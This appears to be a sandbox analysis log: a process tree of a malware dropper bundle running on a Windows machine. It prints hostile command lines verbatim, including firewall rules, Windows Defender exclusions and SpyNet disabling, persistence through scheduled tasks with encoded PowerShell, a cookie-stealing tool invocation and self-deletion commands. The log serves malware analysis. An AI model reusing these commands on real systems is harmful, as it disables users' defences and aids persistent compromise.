                                                                                                                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                7⤵
                                                                                                                  PID:4908
                                                                                                                • C:\Users\Admin\myhaqqul.exe
                                                                                                                  "C:\Users\Admin\myhaqqul.exe" /d"C:\Users\Admin\Documents\wxLS_oflLOAo_7IEv_qFDR0F.exe"
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks computer location settings
                                                                                                                  PID:5676
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hremwquv.exe" C:\Windows\SysWOW64\zmxgodr\
                                                                                                                    8⤵
                                                                                                                      PID:3440
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      "C:\Windows\System32\sc.exe" config zmxgodr binPath= "C:\Windows\SysWOW64\zmxgodr\hremwquv.exe /d\"C:\Users\Admin\myhaqqul.exe\""
                                                                                                                      8⤵
                                                                                                                        PID:5024
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        "C:\Windows\System32\sc.exe" start zmxgodr
                                                                                                                        8⤵
                                                                                                                          PID:3484
                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                          8⤵
                                                                                                                            PID:1292
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              9⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4108
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 672
                                                                                                                            8⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5760
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 664
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:4220
                                                                                                                      • C:\Users\Admin\Documents\qBhadtTun23spfOxv19FilBx.exe
                                                                                                                        "C:\Users\Admin\Documents\qBhadtTun23spfOxv19FilBx.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:1720
                                                                                                                      • C:\Users\Admin\Documents\8H3wvNbmf6efkZkPTadtaFfU.exe
                                                                                                                        "C:\Users\Admin\Documents\8H3wvNbmf6efkZkPTadtaFfU.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks processor information in registry
                                                                                                                        PID:228
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                                                                                                          7⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          PID:5856
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 608
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:6000
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 1020
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:2448
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 1020
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:3804
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 928
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:5168
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 1052
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:1988
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 960
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:456
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 1048
                                                                                                                          7⤵
                                                                                                                          • Program crash
                                                                                                                          PID:2596
                                                                                                                      • C:\Users\Admin\Documents\Dw47RB5fgjLeBMhB5S9vfz_O.exe
                                                                                                                        "C:\Users\Admin\Documents\Dw47RB5fgjLeBMhB5S9vfz_O.exe"
                                                                                                                        6⤵
                                                                                                                          PID:4108
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 440
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:5180
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 432
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:1164
                                                                                                                        • C:\Users\Admin\Documents\eUwmUBcx8JcoY23xcnTOSErQ.exe
                                                                                                                          "C:\Users\Admin\Documents\eUwmUBcx8JcoY23xcnTOSErQ.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3728
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 476
                                                                                                                            7⤵
                                                                                                                            • Program crash
                                                                                                                            PID:1164
                                                                                                                        • C:\Users\Admin\Documents\wp6Erp3RVcg4rzRwghhJKvtW.exe
                                                                                                                          "C:\Users\Admin\Documents\wp6Erp3RVcg4rzRwghhJKvtW.exe"
                                                                                                                          6⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks computer location settings
                                                                                                                          PID:2380
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
                                                                                                                            7⤵
                                                                                                                              PID:1808
                                                                                                                              • C:\Windows\system32\mode.com
                                                                                                                                mode 65,10
                                                                                                                                8⤵
                                                                                                                                  PID:2612
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                  7z.exe e file.zip -p320791618516055 -oextracted
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5820
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                  7z.exe e extracted/file_9.zip -oextracted
                                                                                                                                  8⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5524
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                  7z.exe e extracted/file_8.zip -oextracted
                                                                                                                                  8⤵
                                                                                                                                    PID:5516
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                    7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                    8⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:2920
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                    7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                    8⤵
                                                                                                                                      PID:3636
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                      7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                      8⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:5688
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                      7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                      8⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:6036
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                      7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                      8⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:1036
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                      7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                      8⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:964
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\123\7z.exe
                                                                                                                                      7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                      8⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:4620
                                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                                      attrib +H "Result_protected.exe"
                                                                                                                                      8⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:1152
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
                                                                                                                                      "Result_protected.exe"
                                                                                                                                      8⤵
                                                                                                                                        PID:1452
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:5896
                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
                                                                                                                                              10⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:2744
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\222.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\222.exe"
                                                                                                                                            9⤵
                                                                                                                                              PID:5780
                                                                                                                                      • C:\Users\Admin\Documents\94DtfmNTPbx90PjZxbGquCEm.exe
                                                                                                                                        "C:\Users\Admin\Documents\94DtfmNTPbx90PjZxbGquCEm.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Checks computer location settings
                                                                                                                                        PID:3640
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 664
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:2876
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 632
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:2112
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1244
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:6076
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1252
                                                                                                                                          7⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:1700
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "94DtfmNTPbx90PjZxbGquCEm.exe" /f & erase "C:\Users\Admin\Documents\94DtfmNTPbx90PjZxbGquCEm.exe" & exit
                                                                                                                                          7⤵
                                                                                                                                            PID:5980
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /im "94DtfmNTPbx90PjZxbGquCEm.exe" /f
                                                                                                                                              8⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5412
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3640 -s 1104
                                                                                                                                            7⤵
                                                                                                                                            • Program crash
                                                                                                                                            PID:5624
                                                                                                                                        • C:\Users\Admin\Documents\h1jeg28z4RoDVqxO99gg2CMe.exe
                                                                                                                                          "C:\Users\Admin\Documents\h1jeg28z4RoDVqxO99gg2CMe.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:3760
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im h1jeg28z4RoDVqxO99gg2CMe.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\h1jeg28z4RoDVqxO99gg2CMe.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                            7⤵
                                                                                                                                              PID:4936
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im h1jeg28z4RoDVqxO99gg2CMe.exe /f
                                                                                                                                                8⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:3804
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 6
                                                                                                                                                8⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:2884
                                                                                                                                          • C:\Users\Admin\Documents\tp308b5ZmQa8EfQsW1DC0skq.exe
                                                                                                                                            "C:\Users\Admin\Documents\tp308b5ZmQa8EfQsW1DC0skq.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3504
                                                                                                                                          • C:\Users\Admin\Documents\0NfgpFTFnSDOuA2_wS15NKZy.exe
                                                                                                                                            "C:\Users\Admin\Documents\0NfgpFTFnSDOuA2_wS15NKZy.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:3028
                                                                                                                                          • C:\Users\Admin\Documents\4bUsQOVgmnOr31LhLUAHPux7.exe
                                                                                                                                            "C:\Users\Admin\Documents\4bUsQOVgmnOr31LhLUAHPux7.exe"
                                                                                                                                            6⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3820
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\4bUsQOVgmnOr31LhLUAHPux7.exe
                                                                                                                                              7⤵
                                                                                                                                                PID:5924
                                                                                                                                                • C:\Windows\system32\choice.exe
                                                                                                                                                  choice /C Y /N /D Y /T 0
                                                                                                                                                  8⤵
                                                                                                                                                    PID:5692
                                                                                                                                              • C:\Users\Admin\Documents\9u6td7n3uZ5IT3lUtKGdwDFS.exe
                                                                                                                                                "C:\Users\Admin\Documents\9u6td7n3uZ5IT3lUtKGdwDFS.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks computer location settings
                                                                                                                                                PID:2220
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3680
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_5.exe
                                                                                                                                              arnatic_5.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:220
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3536
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_4.exe
                                                                                                                                              arnatic_4.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:4324
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:1288
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                6⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:4544
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3656
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_3.exe
                                                                                                                                              arnatic_3.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:3736
                                                                                                                                              • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
                                                                                                                                                6⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:1792
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1792 -s 600
                                                                                                                                                  7⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:3268
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3684
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:3788
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_1.exe
                                                                                                                                              arnatic_1.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              PID:3720
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3720 -s 1040
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:4180
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS47F3D0BD\arnatic_2.exe
                                                                                                                                      arnatic_2.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      PID:3696
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3720 -ip 3720
                                                                                                                                      1⤵
                                                                                                                                        PID:1848
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1792 -ip 1792
                                                                                                                                        1⤵
                                                                                                                                          PID:4152
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3968 -ip 3968
                                                                                                                                          1⤵
                                                                                                                                            PID:3596
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS34A5.tmp\Install.exe
                                                                                                                                            .\Install.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3788
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4791.tmp\Install.exe
                                                                                                                                              .\Install.exe /S /site_id "525403"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Checks computer location settings
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              PID:2360
                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                3⤵
                                                                                                                                                  PID:2436
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                    4⤵
                                                                                                                                                      PID:5268
                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                        5⤵
                                                                                                                                                          PID:964
                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5236
                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3080
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3732
                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:5084
                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:3764
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /CREATE /TN "gNwbcXNVR" /SC once /ST 01:33:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                3⤵
                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                PID:4964
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /run /I /tn "gNwbcXNVR"
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4288
                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                  schtasks /DELETE /F /TN "gNwbcXNVR"
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5140
                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                    schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 02:48:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ZVVsyDW.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                    PID:1232
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4108 -ip 4108
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2888
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 428
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:4316
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3728 -ip 3728
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3636
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3360
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5360
                                                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                            tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                            PID:3832
                                                                                                                                                                          • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                            find /I /N "bullguardcore.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6044
                                                                                                                                                                            • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                              find /I /N "psuaservice.exe"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4164
                                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                tasklist /FI "imagename eq PSUAService.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                PID:2440
                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5268
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                                                                                                                  Accostarmi.exe.pif N
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3724
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3968 -ip 3968
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5040
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3728 -ip 3728
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:800
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4108 -ip 4108
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4580
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 228 -ip 228
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5900
                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3640 -ip 3640
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5928
